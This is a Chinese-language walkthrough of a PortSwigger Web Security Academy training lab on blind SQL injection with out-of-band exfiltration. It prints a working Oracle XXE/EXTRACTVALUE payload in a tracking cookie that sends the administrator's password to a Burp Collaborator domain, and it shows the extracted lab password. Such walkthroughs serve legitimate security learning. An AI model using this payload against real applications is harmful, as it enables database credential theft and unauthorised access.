Lab17_ Blind SQL injection with out-of-band data exfiltration

文章目录

前言:

实验室标题为:

带外数据泄露的 SQL 盲注

简介:

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。

该数据库包含一个名为users的表,其中的列名为username和password。您需要利用SQL盲目注入漏洞来找出管理员用户的密码。

要解决实验,请以管理员用户身份登录。

注意

为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。

提示

您可以在 SQL 注入小抄中找到一些有用的有效载荷

进入实验室

依然是商店页面

构造 payload

点击任意分类,打开 burp 进行抓包

复制 Collaborator 中的链接

sql 复制代码
TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.c5inwpad5ruzenww7a6z0gt3dujm7cv1.oastify.com/"> %remote;]>'),'/l') FROM dual--

发送数据包,成功响应

转到 Collaborator 模块,点击 Poll now

可以看到管理员账户的密码被成功外带出来

登录管理员账号

administrator

q1uuvho3ov5renjtp936

成功登录管理员账户

相关推荐
好望角雾眠1 小时前
第三阶段数据库-7:sql中函数,运算符,常用关键字
数据库·笔记·sql·学习·sqlserver·c#
做一个AC梦14 小时前
MiniOB环境部署开发(使用Docker)
数据库·sql·miniob·ob·海扬数据库
卓码软件测评19 小时前
软件测试:如何利用Burp Suite进行高效WEB安全测试
网络·安全·web安全·可用性测试·安全性测试
l1t21 小时前
分析xml标签属性和压缩级别对xlsx文件读取解析的影响
xml·开发语言·python·sql·duckdb
DONG9131 天前
Redis内存架构解析与性能优化实战
数据库·redis·sql·database
黑客影儿1 天前
Go特有的安全漏洞及渗透测试利用方法(通俗易懂)
开发语言·后端·安全·web安全·网络安全·golang·系统安全
武昌库里写JAVA2 天前
使用 Java 开发 Android 应用:Kotlin 与 Java 的混合编程
java·vue.js·spring boot·sql·学习
水涵幽树2 天前
MySQL 时间筛选避坑指南:为什么格式化字符串比较会出错?
数据库·后端·sql·mysql·database
funfan05172 天前
在IDEA中DEBUG调试时查看MyBatis-Plus动态生成的SQL语句
sql·intellij-idea·mybatis
AI 嗯啦2 天前
SQL详细语法教程(七)核心优化
数据库·人工智能·sql